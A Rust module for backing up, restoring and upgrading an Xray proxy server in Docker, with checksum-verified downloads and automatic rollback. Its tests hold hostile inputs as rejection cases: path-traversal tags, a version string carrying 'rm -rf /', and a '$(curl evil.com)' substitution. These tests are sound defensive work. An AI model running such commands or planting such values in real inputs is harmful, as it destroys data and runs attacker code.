//! Reusable snapshot/restore/upgrade logic for Xray server.
//!
//! Snapshots are stored on the HOST filesystem (not inside the container)
//! at `<snapshot_dir>/<tag>/`. Each snapshot contains:
//! - server.json, clientsTable, key files
//! - xray binary copy
//! - xray_version.txt with the version string

use base64::Engine;

use crate::backend_trait::XrayBackend;
use crate::error::{AppError, Result};

/// Default host directory where snapshots are stored (outside the container).
pub const DEFAULT_SNAPSHOT_HOST_DIR: &str = "/data/projects/xray-backup";
/// Config directory inside the Xray container.
const XRAY_CONFIG_DIR: &str = "/opt/amnezia/xray";

/// Information about a snapshot.
pub struct SnapshotInfo {
    pub tag: String,
    pub version: String,
    pub users_count: usize,
}

/// Result of an Xray upgrade operation.
pub struct UpgradeResult {
    pub old_version: String,
    pub new_version: String,
    pub snapshot_tag: String,
}

/// Validate a snapshot tag to prevent path traversal.
///
/// Tags must match the format `YYYYMMDD-HHMMSS` (exactly 15 chars:
/// 8 digits, hyphen, 6 digits). This is the format generated by
/// `date +%Y%m%d-%H%M%S` in `create_snapshot`.
pub fn validate_tag(tag: &str) -> Result<()> {
    let valid = tag.len() == 15
        && tag.bytes().enumerate().all(|(i, b)| {
            if i == 8 {
                b == b'-'
            } else {
                b.is_ascii_digit()
            }
        });
    if !valid {
        return Err(AppError::Xray(format!(
            "invalid snapshot tag '{}': expected YYYYMMDD-HHMMSS format",
            tag
        )));
    }
    Ok(())
}

/// Validate a version string from GitHub API or `xray version` output.
///
/// Must match `digits.digits.digits` (e.g. "1.8.24"). Rejects anything
/// that could be used for command injection.
pub fn validate_version(version: &str) -> Result<()> {
    let valid = !version.is_empty()
        && version.len() <= 20
        && version.bytes().all(|b| b.is_ascii_digit() || b == b'.');
    if !valid {
        return Err(AppError::Xray(format!(
            "invalid version string '{}'",
            version
        )));
    }
    Ok(())
}

/// Extract version number from `xray version` output.
///
/// Input like "Xray 1.8.4 (Xray, Penetrates Everything.)" returns "1.8.4".
/// Returns "unknown" if parsing fails.
pub fn extract_version(xray_version_output: &str) -> String {
    xray_version_output
        .split_whitespace()
        .nth(1)
        .filter(|v| v.bytes().all(|b| b.is_ascii_digit() || b == b'.'))
        .unwrap_or("unknown")
        .to_string()
}

/// Create a snapshot on the HOST filesystem using docker cp + exec_on_host.
///
/// Steps:
/// 1. Generate tag from current timestamp
/// 2. Create snapshot directory on host
/// 3. Copy config files from container to host via `docker cp`
/// 4. Save xray version info
///
/// Returns a `SnapshotInfo` with the tag, xray version, and user count.
pub async fn create_snapshot(
    backend: &dyn XrayBackend,
    snapshot_dir: &str,
) -> Result<SnapshotInfo> {
    let container = backend.container_name();

    // Generate tag from current timestamp (on host)
    let tag_result = backend.exec_on_host("date +%Y%m%d-%H%M%S").await?;
    let tag = tag_result.stdout.trim().to_string();
    if tag.is_empty() {
        return Err(AppError::Xray(
            "failed to generate snapshot tag".to_string(),
        ));
    }

    let snapshot_path = format!("{}/{}", snapshot_dir, tag);

    // Create snapshot directory on host
    backend
        .exec_on_host(&format!("mkdir -p {}", snapshot_path))
        .await?;

    // Copy config files from container to host via docker cp
    let files = [
        "server.json",
        "clientsTable",
        "xray_private.key",
        "xray_public.key",
        "xray_short_id.key",
        "xray_uuid.key",
    ];
    for file in &files {
        let src = format!("{}:{}/{}", container, XRAY_CONFIG_DIR, file);
        let dst = format!("{}/{}", snapshot_path, file);
        // Use 2>/dev/null for optional files (keys may not exist)
        backend
            .exec_on_host(&format!("docker cp {} {} 2>/dev/null; true", src, dst))
            .await?;
    }

    // Copy xray binary
    let bin_src = format!("{}:/usr/local/bin/xray", container);
    let bin_dst = format!("{}/xray", snapshot_path);
    let result = backend
        .exec_on_host(&format!("docker cp {} {} && echo OK", bin_src, bin_dst))
        .await?;
    if !result.stdout.contains("OK") {
        return Err(AppError::Xray(format!(
            "failed to copy xray binary: {}",
            result.stderr.trim()
        )));
    }

    // Save xray version (use base64 to avoid shell injection from xray output)
    let ver_result = backend
        .exec_in_container("sh -c 'xray version 2>/dev/null | head -1'")
        .await
        .ok()
        .map(|r| r.stdout.trim().to_string())
        .unwrap_or_else(|| "unknown".to_string());
    let ver_b64 = base64::engine::general_purpose::STANDARD.encode(ver_result.as_bytes());
    backend
        .exec_on_host(&format!(
            "printf '%s' '{}' | base64 -d > {}/xray_version.txt",
            ver_b64, snapshot_path
        ))
        .await?;

    let version = extract_version(&ver_result);

    // Count users from clientsTable
    let users_count = backend
        .exec_on_host(&format!(
            "grep -c 'clientName' {}/clientsTable 2>/dev/null || echo 0",
            snapshot_path
        ))
        .await
        .ok()
        .and_then(|r| r.stdout.trim().parse::<usize>().ok())
        .unwrap_or(0);

    Ok(SnapshotInfo {
        tag,
        version,
        users_count,
    })
}

/// List snapshots from the host directory.
///
/// Returns a list of `SnapshotInfo` sorted by tag (oldest first).
pub async fn list_snapshots(
    backend: &dyn XrayBackend,
    snapshot_dir: &str,
) -> Result<Vec<SnapshotInfo>> {
    let cmd = format!(
        "ls -1d {}/*/  2>/dev/null | while read d; do \
           tag=$(basename \"$d\"); \
           ver=$(cat \"$d/xray_version.txt\" 2>/dev/null | head -1 || echo unknown); \
           users=$(grep -c clientName \"$d/clientsTable\" 2>/dev/null || echo 0); \
           echo \"$tag|$ver|$users\"; \
         done",
        snapshot_dir
    );
    let result = backend.exec_on_host(&cmd).await?;
    let snapshots: Vec<SnapshotInfo> = result
        .stdout
        .lines()
        .filter(|l| l.contains('|'))
        .map(|l| {
            let parts: Vec<&str> = l.splitn(3, '|').collect();
            let tag = parts.first().unwrap_or(&"").trim().to_string();
            let ver_raw = parts.get(1).unwrap_or(&"unknown").trim().to_string();
            let version = extract_version(&ver_raw);
            let users_count = parts
                .get(2)
                .unwrap_or(&"0")
                .trim()
                .parse::<usize>()
                .unwrap_or(0);
            SnapshotInfo {
                tag,
                version,
                users_count,
            }
        })
        .collect();
    Ok(snapshots)
}

/// Restore a snapshot from the host back into the container.
///
/// Copies files from host to container via `docker cp`, then restarts the container.
pub async fn restore_snapshot(
    backend: &dyn XrayBackend,
    tag: &str,
    snapshot_dir: &str,
) -> Result<()> {
    validate_tag(tag)?;
    let container = backend.container_name();
    let snapshot_path = format!("{}/{}", snapshot_dir, tag);

    // Verify snapshot exists
    let check = backend
        .exec_on_host(&format!("test -d {} && echo OK", snapshot_path))
        .await?;
    if !check.stdout.contains("OK") {
        return Err(AppError::Xray(format!("snapshot '{}' not found", tag)));
    }

    // Copy config files from host to container
    let files = [
        ("server.json", XRAY_CONFIG_DIR),
        ("clientsTable", XRAY_CONFIG_DIR),
        ("xray_private.key", XRAY_CONFIG_DIR),
        ("xray_public.key", XRAY_CONFIG_DIR),
        ("xray_short_id.key", XRAY_CONFIG_DIR),
        ("xray_uuid.key", XRAY_CONFIG_DIR),
    ];
    for (file, dest) in &files {
        let src = format!("{}/{}", snapshot_path, file);
        let dst = format!("{}:{}/{}", container, dest, file);
        backend
            .exec_on_host(&format!("docker cp {} {} 2>/dev/null; true", src, dst))
            .await?;
    }

    // Copy xray binary
    let bin_src = format!("{}/xray", snapshot_path);
    let bin_dst = format!("{}:/usr/local/bin/xray", container);
    let result = backend
        .exec_on_host(&format!(
            "docker cp {} {} && docker exec {} chmod +x /usr/local/bin/xray && echo OK",
            bin_src, bin_dst, container
        ))
        .await?;
    if !result.stdout.contains("OK") {
        return Err(AppError::Xray(format!(
            "failed to restore xray binary: {}",
            result.stderr.trim()
        )));
    }

    // Restart container
    backend
        .exec_on_host(&format!("docker restart {} 2>&1", container))
        .await?;

    Ok(())
}

/// Get the latest Xray release version from GitHub API.
///
/// Validates the returned version to prevent injection of arbitrary strings.
pub async fn get_latest_xray_version(backend: &dyn XrayBackend) -> Result<String> {
    let result = backend
        .exec_on_host("curl -sf --max-time 10 https://api.github.com/repos/XTLS/Xray-core/releases/latest | jq -r '.tag_name' | tr -d 'v'")
        .await
        .map_err(|e| AppError::Xray(format!("failed to check latest version: {}", e)))?;

    let version = result.stdout.trim().to_string();
    if version.is_empty() {
        return Err(AppError::Xray(
            "failed to fetch latest version from GitHub".to_string(),
        ));
    }

    validate_version(&version)?;
    Ok(version)
}

/// Detect the host architecture and return the matching Xray asset name.
fn xray_asset_name(arch: &str) -> Result<&'static str> {
    match arch.trim() {
        "x86_64" | "amd64" => Ok("Xray-linux-64.zip"),
        "aarch64" | "arm64" => Ok("Xray-linux-arm64-v8a.zip"),
        "armv7l" => Ok("Xray-linux-arm32-v7a.zip"),
        other => Err(AppError::Xray(format!(
            "unsupported architecture: {}",
            other
        ))),
    }
}

/// Upgrade Xray to the latest version.
///
/// Full cycle:
/// 1. Check current vs latest version
/// 2. Create snapshot (pre-upgrade backup)
/// 3. Download new binary with SHA256 verification
/// 4. Replace binary in container
/// 5. Restart and verify
/// 6. Auto-rollback on failure
///
/// Returns an `UpgradeResult` with old/new versions and the snapshot tag.
pub async fn upgrade_xray(backend: &dyn XrayBackend, snapshot_dir: &str) -> Result<UpgradeResult> {
    let container = backend.container_name();

    // Get current version
    let ver_result = backend
        .exec_in_container("sh -c 'xray version 2>&1 | head -1'")
        .await?;
    let old_version = extract_version(&ver_result.stdout);

    // Get latest version
    let latest = get_latest_xray_version(backend).await?;

    if latest == old_version {
        return Err(AppError::Xray(format!(
            "already on latest version v{}",
            latest
        )));
    }

    // Detect host architecture
    let arch_result = backend.exec_on_host("uname -m").await?;
    let asset = xray_asset_name(arch_result.stdout.trim())?;

    // Create snapshot before upgrade
    let snapshot = create_snapshot(backend, snapshot_dir).await?;

    // Download + verify + extract
    let download_and_verify = async {
        // Download binary zip
        let download_cmd = format!(
            "curl -sfL --max-time 120 -o /tmp/xray-upgrade.zip \
             https://github.com/XTLS/Xray-core/releases/download/v{}/{} && echo OK",
            latest, asset
        );
        let result = backend.exec_on_host(&download_cmd).await?;
        if !result.stdout.contains("OK") {
            return Err(AppError::Xray(format!(
                "download failed: {}",
                result.combined_output()
            )));
        }

        // Download .dgst file and verify SHA256.
        // `-L` is required because GitHub Releases assets return a 302 redirect
        // to a CDN URL; without `-L`, curl emits an empty body and verification fails.
        let dgst_cmd = format!(
            "curl -sfL --max-time 30 \
             https://github.com/XTLS/Xray-core/releases/download/v{}/{}.dgst",
            latest, asset
        );
        let dgst_result = backend.exec_on_host(&dgst_cmd).await?;
        // XTLS .dgst files use the OpenSSL dgst format: `SHA2-256= <hex>`.
        // Accept both `SHA2-256` (actual) and `SHA256` (legacy/defensive) prefixes.
        let expected_hash = dgst_result
            .stdout
            .lines()
            .find(|l| l.starts_with("SHA2-256") || l.starts_with("SHA256"))
            .and_then(|l| l.split_once('='))
            .map(|(_, h)| h.trim().to_lowercase())
            .ok_or_else(|| AppError::Xray("SHA256 hash not found in .dgst file".to_string()))?;

        let actual_hash = backend
            .exec_on_host("sha256sum /tmp/xray-upgrade.zip | cut -d' ' -f1")
            .await?
            .stdout
            .trim()
            .to_lowercase()
            .to_string();

        if actual_hash != expected_hash {
            return Err(AppError::Xray(format!(
                "SHA256 verification failed: expected {}, got {}",
                expected_hash, actual_hash
            )));
        }

        // Extract binary
        let extract_cmd =
            "python3 -c \"import zipfile; z=zipfile.ZipFile('/tmp/xray-upgrade.zip'); \
             z.extract('xray','/tmp'); z.close()\" && chmod +x /tmp/xray && echo OK";
        let result = backend.exec_on_host(extract_cmd).await?;
        if !result.stdout.contains("OK") {
            return Err(AppError::Xray(format!(
                "extraction failed: {}",
                result.combined_output()
            )));
        }

        Ok(())
    };

    if let Err(e) = download_and_verify.await {
        // Cleanup temp files on download/verify failure (snapshot is still valid)
        let _ = backend
            .exec_on_host("rm -f /tmp/xray-upgrade.zip /tmp/xray")
            .await;
        return Err(e);
    }

    // Replace binary in container + restart (rollback on failure)
    let replace_and_restart = async {
        let replace_cmd = format!(
            "docker cp /tmp/xray {}:/usr/local/bin/xray && \
             docker exec {} chmod +x /usr/local/bin/xray && \
             echo OK",
            container, container
        );
        let result = backend.exec_on_host(&replace_cmd).await?;
        if !result.stdout.contains("OK") {
            return Err(AppError::Xray(format!(
                "binary replacement failed: {}",
                result.combined_output()
            )));
        }

        backend
            .exec_on_host(&format!("docker restart {} 2>&1", container))
            .await?;
        backend.exec_on_host("sleep 2").await?;

        Ok::<(), AppError>(())
    };

    if let Err(e) = replace_and_restart.await {
        log::error!(
            "Upgrade failed after snapshot {}, attempting rollback: {}",
            snapshot.tag,
            e
        );
        // Cleanup temp files
        let _ = backend
            .exec_on_host("rm -f /tmp/xray-upgrade.zip /tmp/xray")
            .await;
        // Attempt rollback
        if let Err(rollback_err) = restore_snapshot(backend, &snapshot.tag, snapshot_dir).await {
            return Err(AppError::Xray(format!(
                "upgrade failed ({}) AND rollback failed ({})",
                e, rollback_err
            )));
        }
        return Err(AppError::Xray(format!(
            "upgrade failed ({}), rolled back to snapshot {}",
            e, snapshot.tag
        )));
    }

    // Cleanup temp files
    let _ = backend
        .exec_on_host("rm -f /tmp/xray-upgrade.zip /tmp/xray")
        .await;

    // Verify new version
    let new_ver_result = backend
        .exec_in_container("sh -c 'xray version 2>&1 | head -1'")
        .await
        .ok()
        .map(|r| r.stdout.trim().to_string())
        .unwrap_or_else(|| "unknown".to_string());
    let new_version = extract_version(&new_ver_result);

    Ok(UpgradeResult {
        old_version,
        new_version,
        snapshot_tag: snapshot.tag,
    })
}

/// Pack a snapshot into a tar.gz archive (returned as raw bytes).
///
/// Uses `tar czf` on the host, then reads it back via base64 encoding.
pub async fn pack_snapshot_zip(
    backend: &dyn XrayBackend,
    tag: &str,
    snapshot_dir: &str,
) -> Result<Vec<u8>> {
    validate_tag(tag)?;
    let snapshot_path = format!("{}/{}", snapshot_dir, tag);
    let tmp_archive = format!("/tmp/snapshot-{}.tar.gz", tag);

    // Verify snapshot exists
    let check = backend
        .exec_on_host(&format!("test -d {} && echo OK", snapshot_path))
        .await?;
    if !check.stdout.contains("OK") {
        return Err(AppError::Xray(format!("snapshot '{}' not found", tag)));
    }

    // Create tar.gz and encode as base64
    let cmd = format!(
        "cd {} && tar czf {} . && base64 {} && rm -f {}",
        snapshot_path, tmp_archive, tmp_archive, tmp_archive
    );
    let result = backend.exec_on_host(&cmd).await?;
    if result.stdout.trim().is_empty() {
        return Err(AppError::Xray(format!(
            "failed to pack snapshot: {}",
            result.stderr.trim()
        )));
    }

    // Decode base64 to bytes
    let b64_clean: String = result
        .stdout
        .chars()
        .filter(|c| !c.is_whitespace())
        .collect();
    let bytes = base64::engine::general_purpose::STANDARD
        .decode(&b64_clean)
        .map_err(|e| AppError::Xray(format!("failed to decode snapshot archive: {}", e)))?;

    Ok(bytes)
}

/// Back up the bridge `config.json` into an existing snapshot directory.
///
/// Fetches the config via the bridge-agent HTTP API and writes it to
/// `<snapshot_dir>/<tag>/bridge-config.json` on the egress host.
/// Best-effort: callers should log and ignore errors rather than failing the snapshot.
pub async fn backup_bridge_config(
    backend: &dyn XrayBackend,
    bridge_client: &crate::bridge_client::BridgeClient,
    snapshot_dir: &str,
    tag: &str,
) -> Result<()> {
    validate_tag(tag)?;
    let config = bridge_client
        .get_backup()
        .map_err(|e| AppError::Xray(format!("bridge backup fetch: {}", e)))?;
    let b64 = base64::engine::general_purpose::STANDARD.encode(config.as_bytes());
    let path = format!("{}/{}/bridge-config.json", snapshot_dir, tag);
    backend
        .exec_on_host(&format!("printf '%s' '{}' | base64 -d > {}", b64, path))
        .await?;
    Ok(())
}

/// Restore the bridge `config.json` from a snapshot.
///
/// Reads `<snapshot_dir>/<tag>/bridge-config.json` from the egress host and
/// sends it to the bridge-agent HTTP API, which overwrites the file and
/// restarts the xray-bridge container.
/// Silently succeeds for old snapshots that predate bridge backups.
/// Best-effort: callers should log and ignore errors rather than failing the restore.
pub async fn restore_bridge_config(
    backend: &dyn XrayBackend,
    bridge_client: &crate::bridge_client::BridgeClient,
    snapshot_dir: &str,
    tag: &str,
) -> Result<()> {
    validate_tag(tag)?;
    let path = format!("{}/{}/bridge-config.json", snapshot_dir, tag);

    // Skip silently for snapshots taken before bridge backup was added
    let check = backend
        .exec_on_host(&format!("test -f {} && echo OK", path))
        .await?;
    if !check.stdout.contains("OK") {
        return Ok(());
    }

    let result = backend
        .exec_on_host(&format!("cat {} | base64", path))
        .await?;
    let b64_clean: String = result
        .stdout
        .chars()
        .filter(|c| !c.is_whitespace())
        .collect();
    let bytes = base64::engine::general_purpose::STANDARD
        .decode(&b64_clean)
        .map_err(|e| AppError::Xray(format!("decode bridge config: {}", e)))?;
    let config = String::from_utf8(bytes)
        .map_err(|e| AppError::Xray(format!("bridge config not UTF-8: {}", e)))?;

    bridge_client
        .restore_backup(&config)
        .map_err(|e| AppError::Xray(format!("bridge restore: {}", e)))?;
    Ok(())
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_validate_tag_valid() {
        assert!(validate_tag("20260416-143000").is_ok());
        assert!(validate_tag("20251231-235959").is_ok());
        assert!(validate_tag("20260101-000000").is_ok());
    }

    #[test]
    fn test_validate_tag_path_traversal() {
        assert!(validate_tag("../../etc/cron.d").is_err());
        assert!(validate_tag("../../../tmp/evil").is_err());
        assert!(validate_tag("20260416-14300").is_err()); // too short
        assert!(validate_tag("20260416-1430001").is_err()); // too long
        assert!(validate_tag("2026041a-143000").is_err()); // letter
        assert!(validate_tag("").is_err());
        assert!(validate_tag("latest").is_err());
    }

    #[test]
    fn test_validate_version_valid() {
        assert!(validate_version("1.8.4").is_ok());
        assert!(validate_version("26.3.27").is_ok());
        assert!(validate_version("1.0").is_ok());
    }

    #[test]
    fn test_validate_version_injection() {
        assert!(validate_version("1.8.4; rm -rf /").is_err());
        assert!(validate_version("$(curl evil.com)").is_err());
        assert!(validate_version("").is_err());
        assert!(validate_version("a.b.c").is_err());
    }

    #[test]
    fn test_extract_version() {
        assert_eq!(
            extract_version("Xray 1.8.4 (Xray, Penetrates Everything.)"),
            "1.8.4"
        );
        assert_eq!(extract_version("Xray 26.3.27"), "26.3.27");
        assert_eq!(extract_version("unknown"), "unknown");
        assert_eq!(extract_version(""), "unknown");
        // Reject non-version tokens
        assert_eq!(extract_version("Xray $(malicious) something"), "unknown");
    }

    #[test]
    fn test_xray_asset_name() {
        assert_eq!(xray_asset_name("x86_64").unwrap(), "Xray-linux-64.zip");
        assert_eq!(xray_asset_name("amd64").unwrap(), "Xray-linux-64.zip");
        assert_eq!(
            xray_asset_name("aarch64").unwrap(),
            "Xray-linux-arm64-v8a.zip"
        );
        assert_eq!(
            xray_asset_name("arm64").unwrap(),
            "Xray-linux-arm64-v8a.zip"
        );
        assert!(xray_asset_name("mips").is_err());
    }
}
